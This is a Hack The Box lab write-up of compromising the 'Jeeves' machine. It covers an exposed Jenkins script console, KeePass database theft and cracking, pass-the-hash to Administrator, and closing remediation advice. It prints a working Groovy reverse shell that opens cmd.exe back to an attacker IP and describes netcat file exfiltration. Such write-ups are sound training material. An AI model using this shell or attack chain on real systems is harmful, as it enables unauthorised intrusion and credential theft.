Michael Thelen

NinjaCat - Security Analyst - Cyber Security Enthusiast

18 Jun 2018

Hack The Box Write-Up Jeeves

Estimated read time: ~5 minutes

Hack The Box is an online platform that hosts virtual machines that are vulnerable by design to sharpen one’s penetration testing and security skills. While Jeeves is not a very complex machine to compromise gaining administrative access still requires several offensive techniques that offer an interesting learning experience.

Tools Used

  • Nmap
  • Firefox browser
  • Gobuster
  • Ncat and Netcat
  • Basic Groovy scripting
  • Basic PowerShell commands
  • John the Ripper
  • KeepassXC
  • Pth-Winexe

Enumeration: Nmap

Running an initial scan with Nmap reveals that ports 80, 135, 445 and 50000 are open. “Nmap Initial Scan”

Running a targeted scan against ports 80, 135, 445 and 50000 with Nmap’s default and service enumeration scripts reveals a Microsoft IIS 10 web server and the Microsoft RPC and SMB services. At this point it is fairly certain that Jeeves is a Windows machine.

Port 50000 with the service banner Jetty 9.4.z-SNAPSHOT stands out immediately from the other services as this is not a standard service bundled with the Windows operating system. “Nmap Service Scan”

Enumeration: Firefox

A quick Google search leads to a Wikipedia article and reveals that Jetty is a Java web server. A visit to the website on port 50000 with the Firefox browser results in a 404 error page. “Jetty 404 Error”

Enumeration: Gobuster

Digging a bit deeper a Gobuster scan reveals the askjeeves directory. “Gobuster Scan Askjeeves Directory”

Enumeration: Firefox Continued

Investigating the askjeeves directory reveals a Jenkins installation that exposes administrative functionality without the need to authenticate. “Jenkins Installation”

Browsing around on the Jenkins website reveals a script console. “Jenkins Script Console”

Exploitation: Initial Shell

Further investigation of the Jenkins script console reveals that it is possible to run Groovy scripts. This functionality can be leveraged to execute code on the machine. “Groovy Script Console”

Preparing an Ncat listener on port 443 to catch the connection. “Preparing Ncat Listener on Port 443”

Initiating a connection with the script console to the listener on port 443 is trivial and can be achieved with the following Groovy script.

1
2
3
4
String host="10.10.14.4";
int port=443;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

The initial Groovy reverse shell on the attacking machine. Currently having a foothold as the low privileged Kohsuke user. “Groovy Initial Reverse Shell”

Privilege Escalation

Browsing through the documents folder of the Kohsuke user reveals a CEH.kdbx Keepass database. There is a possibility this Keepass database contains information to expand influence or elevate privileges. Spending some time to transfer the database to the attacking machine and crack it can be a good investment. “CEH.kdbx in User Directory”

Netcat can be leveraged to transfer the CEH.kdbx file from Jeeves to the attacking machine. Transferring the nc.exe file to Jeeves is trivial with the Python Simple HTTP server module and a little bit of PowerShell knowledge. “Preparing Python Simple HTTP Server”

PowerShell is installed on Windows by default and can be leveraged to download the nc.exe file from the web server that is listening on port 8000. “Download nc.exe With PowerShell”

Preparing an Ncat listener on the attacking machine to receive the file transfer. “Ncat Listener for CEH.kdbx transfer”

Initiating the CEH.kdbx file transfer with Netcat from the Jeeves machine. “Transfer CEH.kdbx to Attacker”

Ncat on the attacking machine receives the connection and the CEH.kdbx file transfer. “Receiving the CEH.kdbx File”

Now that the Keepass database is available on the attacking machine an attempt can be made to crack the password hash to gain access to the data stored within the database.

The password hash can be extracted with Keepass2John. After the hash is extracted it can be cracked with John the Ripper and the well know rockyou password database. It does not take long before the password is found. “Cracking the CEH.kdbx Password”

Now that the password of the Keepass database is found KeepassXC can be used to open the file and inspect its contents. Several entries are present but a Windows NTLM hash stands out among all other entries. “Windows NTLM Hash”

Exploitation: Administrator

Windows NTLM hashes can be used in a well-known attack called Pass the Hash. To gain a command line shell on the Jeeves machine the pth-winexe command line utility can be used. Launching the Pass the Hash attack with the discovered hash spawns a command line shell as the Administrator user. “Pass the Hash Attack”

Exposing the Root Flag

At this point the Jeeves machine is fully compromised and in a real-world engagement it is game over, however to complete the Hack The Box challenge the root.txt flag needs to be obtained as-well.

The creator of the challenge cleverly hid the root.txt flag within an alternate data stream as can be discovered with the dir /R command. Using the more command the root.txt alternate data stream can be read and reveals the root.txt flag. “Getting the Root Flag”

Remediation

The Jenkins installation on port 50000 exposed administrative functionality without the need to authenticate and is an example of broken access controls. This configuration error allowed any user with access to the Jenkins website to access administrative functionality that could be leveraged to execute code.

The use of a weak password for the Keepass database made it trivial to crack. This in turn resulted in the disclosure of sensitive information that was used to elevate privileges resulting in the full compromise of the Jeeves machine.

The following configuration and policy changes should be considered to mitigate risk.

  • Enforce encrypted communication for the askjeeves directory on the web server
  • Protect access to administrative functionality on the Jenkins installation with proper authentication and authorization
  • Implement strong password policy guidelines and enforce those guidelines where possible
  • Inform users about the importance of strong passwords, train them in the practice of making strong but easy to remember passwords and how to store passwords securely